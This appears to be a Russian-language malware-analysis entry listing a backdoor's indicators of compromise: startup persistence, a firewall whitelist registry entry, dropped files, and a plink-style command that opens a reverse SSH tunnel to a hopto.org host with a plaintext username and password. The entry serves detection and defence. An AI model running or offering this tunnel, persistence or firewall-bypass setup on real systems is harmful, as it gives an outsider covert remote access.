Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\shost.lnk
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Default\DlHost.exe' = 'C:\Default\DlHost.exe:*:Enabled:host'
- 'C:\Default\System.exe' -ssh -R 28749:127.0.0.2:22 55http.hopto.org -l 55http -pw 2n16122N
- 'C:\Default\DlHost.exe' -d -t -l -e0.0.0.0 -i127.0.0.2 -p22 -a
- '<SYSTEM32>\wscript.exe' "c:\Default\DlHost.vbe"
- C:\Default\Uninst_sert fimei fme.log
- %TEMP%\~SB9.tmp
- %TEMP%\~SB8.tmp
- C:\Default\DlHost.exe
- <LS_APPDATA>\PUTTY.RND
- C:\Default\System.exe
- C:\Default\DlHost.vbe
- %TEMP%\LSB3.tmp
- %TEMP%\LSB2.tmp
- %TEMP%\LSB1.tmp
- %TEMP%\~SB4.tmp
- %TEMP%\~SB7.tmp
- %TEMP%\~SB6.tmp
- %TEMP%\~SB5.tmp
- %TEMP%\~SB7.tmp
- %TEMP%\~SB4.tmp
- %TEMP%\LSB3.tmp
- %TEMP%\LSB2.tmp
- %TEMP%\~SB6.tmp
- %TEMP%\~SB8.tmp
- %TEMP%\LSB1.tmp
- %TEMP%\~SB5.tmp
- %TEMP%\~SB9.tmp
- '55####.hopto.org':22
- DNS ASK 55####.hopto.org